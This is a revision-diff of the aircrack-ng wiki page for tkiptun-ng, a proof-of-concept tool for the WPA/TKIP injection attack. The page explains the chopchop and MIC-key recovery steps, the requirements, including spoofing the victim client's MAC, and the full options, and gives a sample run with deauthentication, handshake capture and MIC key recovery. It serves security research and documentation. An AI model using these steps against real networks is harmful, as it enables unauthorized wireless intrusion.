Both sides previous revisionPrevious revisionNext revision | Previous revisionNext revisionBoth sides next revision |
tkiptun-ng [2008/11/06 20:25] – added link to instructions to install it mister_x | tkiptun-ng [2009/08/10 21:50] – Added link to Cryptanalysis of IEEE 802.11i TKIP paper darkaudax |
---|
====== tkiptun-ng ====== | ====== Tkiptun-ng ====== |
| |
===== Description ===== | ===== Description ===== |
| |
It is a tool created by Martin Beck aka hirte, a member of aircrack-ng team. This tool is able to inject a few frames in a WPA TKIP network with QoS. | NOTE: This documention is still under development. Please check back on a regular basis to obtain the latest updates. If you have any feedback on the documentation, please post your comments to the [[http://forum.aircrack-ng.org|Forum]]. |
| |
| **IMPORTANT NOTE:** The tkiptun-ng SVN version is not fully working. The final attack phase is not yet implemented. The other portions are working with the ieee80211 drivers for RT73 and RTL8187L chipsets. The madwifi-ng driver is definitely broken and is known to completely fail. tkiptun-ng may work with other drivers but has not been tested so your mileage may vary. |
| |
| Tkiptun-ng is a tool created by Martin Beck aka hirte, a member of aircrack-ng team. This tool is able to inject a few frames into a WPA TKIP network with QoS. He worked with Erik Tews (who created PTW attack) for a conference in [[http://pacsec.jp/|PacSec 2008]]: "Gone in 900 Seconds, Some Crypto Issues with WPA". |
| |
| Tkiptun-ng is the proof-of-concept implementation the WPA/TKIP attack. This attack is described in the paper, [[http://dl.aircrack-ng.org/breakingwepandwpa.pdf|Practical attacks against WEP and WPA]] written by Martin Beck and Erik Tews. The paper describes advanced attacks on WEP and the first practical attack on WPA. An additional excellent references explaining how tkiptun-ng does its magic is this ars technica article [[http://arstechnica.com/security/news/2008/11/wpa-cracked.ars/|Battered, but not broken: understanding the WPA crack]] by Glenn Fleishman. |
| |
| Basically tkiptun-ng starts by obtaining the plaintext of a small packet and the MIC (Message Integrity Check). This is done via [[chopchoptheory|chopchop]]-type method. Once this is done, the MICHAEL algorithm is reversed the MIC key used to protect packets being sent from the AP to the client can be calculated. |
| |
| At this point, tkiptun-ng has recovered the MIC key and knows a keystram for access point to client communication. Subsequently, using the XOR file, you can create new packets and inject them. The creation and injection are done using the other aircrack-ng suite tools. |
| |
| [[http://wiki-files.aircrack-ng.org/doc/tkip_master.pdf|Cryptanalysis of IEEE 802.11i TKIP]] by Finn Michael Halvorsen and Olav Haugen, June 2009 provides an excellent detailed description of how tkiptun-ng works. As well, their paper includes detailed descriptions of many other attacks against WEP/WPA/WPA2. |
| |
| Please remember this is an extremely advanced attack. You require advanced linux and aircrack-ng skills to use this tool. DO NOT EXPECT support unless you can demonstrate you have these skills. Novices will NOT BE SUPPORTED. |
| |
| |
| ===== General Requirements ===== |
| |
| Both the AP and the client must support QoS or sometimes called Wi-Fi Multi-media (WMM) on some APs. |
| |
| The AP must be configured for WPA plus TKIP. |
| |
| A fairly long rekeying time must be in use such as 3600 seconds. It should be at least 20 minutes. |
| |
| |
| ===== Specific Requirements ===== |
| |
| The network card MAC address that is used by tkiptun-ng needs to be set to the MAC address of the client you are attacking. |
| |
| |
| |
| ===== Why? ===== |
| |
| This section is very preliminary. As tkiptun-ng works, it goes through various phases. People ask "Why is such and such done?". This section attempts to answer those questions. |
| |
| **Question:** \\ |
| Why is the handshake gathered? |
| |
| **Answer:** \\ |
| It is done for debugging reasons. First, so that the temporal keys in tkiptun can be calculated. Second, check them against the calculated values from the plaintext packet. |
| |
| Another reason, is to check if the AP/client reuses the nonces after a mic shutdown. |
| |
| |
| ===== Usage ===== |
| |
| Usage: tkiptun-ng <options> <replay interface> |
| |
| Filter options: |
| |
| * -d dmac : MAC address, Destination |
| * -s smac : MAC address, Source |
| * -m len : minimum packet length |
| * -n len : maximum packet length |
| * -t tods : frame control, To DS bit |
| * -f fromds : frame control, From DS bit |
| * -D : disable AP detection |
| |
| Replay options: |
| |
| * -x nbpps : number of packets per second |
| * -a bssid : set Access Point MAC address |
| * -c dmac : set Destination MAC address |
| * -h smac : set Source MAC address |
| * -F : choose first matching packet |
| * -e essid : set target AP SSID |
| |
| Debug options: |
| |
| * -K prga : keystream for continuation |
| * -y file : keystream-file for continuation |
| * -j : inject FromDS packets |
| * -P pmk : pmk for verification/vuln testing |
| * -p psk : psk to calculate pmk with essid |
| |
| Source options: |
| |
| * -i iface : capture packets from this interface |
| * -r file : extract packets from this pcap file |
| \\ |
| *-''''-help : Displays this usage screen |
| |
| |
| ===== Usage Examples ===== |
| |
| The example below is incomplete but it gives some idea of how it looks. |
| |
| Input: |
| |
| tkiptun-ng -h 00:0F:B5:AB:CB:9D -a 00:14:6C:7E:40:80 -m 80 -n 100 rausb0 |
| |
| Output: |
| |
| The interface MAC (00:0E:2E:C5:81:D3) doesn't match the specified MAC (-h). |
| ifconfig rausb0 hw ether 00:0F:B5:AB:CB:9D |
| Blub 2:38 E6 38 1C 24 15 1C CF |
| Blub 1:17 DD 0D 69 1D C3 1F EE |
| Blub 3:29 31 79 E7 E6 CF 8D 5E |
| 15:06:48 Michael Test: Successful |
| 15:06:48 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9 |
| 15:06:48 Found specified AP |
| 15:06:48 Sending 4 directed DeAuth. STMAC: [00:0F:B5:AB:CB:9D] [ 0| 0 ACKs] |
| 15:06:54 Sending 4 directed DeAuth. STMAC: [00:0F:B5:AB:CB:9D] [ 0| 0 ACKs] |
| 15:06:56 WPA handshake: 00:14:6C:7E:40:80 captured |
| 15:06:56 Waiting for an ARP packet coming from the Client... |
| Saving chosen packet in replay_src-0305-150705.cap |
| 15:07:05 Waiting for an ARP response packet coming from the AP... |
| Saving chosen packet in replay_src-0305-150705.cap |
| 15:07:05 Got the answer! |
| 15:07:05 Waiting 10 seconds to let encrypted EAPOL frames pass without interfering. |
| |
| 15:07:25 Offset 99 ( 0% done) | xor = B3 | pt = D3 | 103 frames written in 84468ms |
| 15:08:32 Offset 98 ( 1% done) | xor = AE | pt = 80 | 64 frames written in 52489ms |
| 15:09:45 Offset 97 ( 3% done) | xor = DE | pt = C8 | 131 frames written in 107407ms |
| 15:11:05 Offset 96 ( 5% done) | xor = 5A | pt = 7A | 191 frames written in 156619ms |
| 15:12:07 Offset 95 ( 6% done) | xor = 27 | pt = 02 | 21 frames written in 17221ms |
| 15:13:11 Offset 94 ( 8% done) | xor = D8 | pt = AB | 41 frames written in 33625ms |
| 15:14:12 Offset 93 (10% done) | xor = 94 | pt = 62 | 13 frames written in 10666ms |
| 15:15:24 Offset 92 (11% done) | xor = DF | pt = 68 | 112 frames written in 91829ms |
| Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down. |
| 15:18:13 Offset 91 (13% done) | xor = A1 | pt = E1 | 477 frames written in 391139ms |
| 15:19:32 Offset 90 (15% done) | xor = 5F | pt = B2 | 186 frames written in 152520ms |
| Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down. |
| 15:22:09 Offset 89 (16% done) | xor = 9C | pt = 77 | 360 frames written in 295200ms |
| Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down. |
| Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down. |
| 15:26:10 Offset 88 (18% done) | xor = 0D | pt = 3E | 598 frames written in 490361ms |
| 15:27:33 Offset 87 (20% done) | xor = 8C | pt = 00 | 230 frames written in 188603ms |
| 15:28:38 Offset 86 (21% done) | xor = 67 | pt = 00 | 47 frames written in 38537ms |
| 15:29:53 Offset 85 (23% done) | xor = AD | pt = 00 | 146 frames written in 119720ms |
| 15:31:16 Offset 84 (25% done) | xor = A3 | pt = 00 | 220 frames written in 180401ms |
| 15:32:23 Offset 83 (26% done) | xor = 28 | pt = 00 | 75 frames written in 61499ms |
| 15:33:38 Offset 82 (28% done) | xor = 7C | pt = 00 | 141 frames written in 115619ms |
| 15:34:40 Offset 81 (30% done) | xor = 02 | pt = 00 | 19 frames written in 15584ms |
| 15:35:57 Offset 80 (31% done) | xor = C9 | pt = 00 | 171 frames written in 140221ms |
| 15:37:13 Offset 79 (33% done) | xor = 38 | pt = 00 | 148 frames written in 121364ms |
| 15:38:21 Offset 78 (35% done) | xor = 71 | pt = 00 | 84 frames written in 68872ms |
| Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down. |
| 15:40:55 Offset 77 (36% done) | xor = 8E | pt = 00 | 328 frames written in 268974ms |
| Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down. |
| 15:43:31 Offset 76 (38% done) | xor = 38 | pt = 00 | 355 frames written in 291086ms |
| 15:44:37 Offset 75 (40% done) | xor = 79 | pt = 00 | 61 frames written in 50021ms |
| Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down. |
| 15:47:05 Offset 74 (41% done) | xor = 59 | pt = 00 | 269 frames written in 220581ms |
| 15:48:30 Offset 73 (43% done) | xor = 14 | pt = 00 | 249 frames written in 204178ms |
| 15:49:49 Offset 72 (45% done) | xor = 9A | pt = 00 | 183 frames written in 150059ms |
| Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down. |
| 15:52:32 Offset 71 (46% done) | xor = 03 | pt = 00 | 420 frames written in 344400ms |
| 15:53:57 Offset 70 (48% done) | xor = 0E | pt = 00 | 239 frames written in 195980ms |
| Sleeping for 60 seconds.36 bytes still unknown |
| ARP Reply |
| Checking 192.168.x.y |
| 15:54:11 Reversed MIC Key (FromDS): C3:95:10:04:8F:8D:6C:66 |
| |
| Saving plaintext in replay_dec-0305-155411.cap |
| Saving keystream in replay_dec-0305-155411.xor |
| 15:54:11 |
| Completed in 2816s (0.02 bytes/s) |
| |
| 15:54:11 AP MAC: 00:40:F4:77:F0:9B IP: 192.168.21.42 |
| 15:54:11 Client MAC: 00:0F:B5:AB:CB:9D IP: 192.168.21.112 |
| 15:54:11 Sent encrypted tkip ARP request to the client. |
| 15:54:11 Wait for the mic countermeasure timeout of 60 seconds. |
| |
| |
| ===== Usage Tips ===== |
| |
| None at this time. |
| |
| ===== Usage Troubleshooting ===== |
| |
| None at this time. |
| |
He worked a few weeks ago with Erik Tews (who created PTW attack) for a conference in [[http://pacsec.jp/|PacSec 2008]]: "Gone in 900 Seconds, Some Crypto Issues with WPA". | |
| |
It is currently only available in our subversion repository. Instructions to install it can be found [[install_aircrack#latest_svn_development_sources|here]]. | |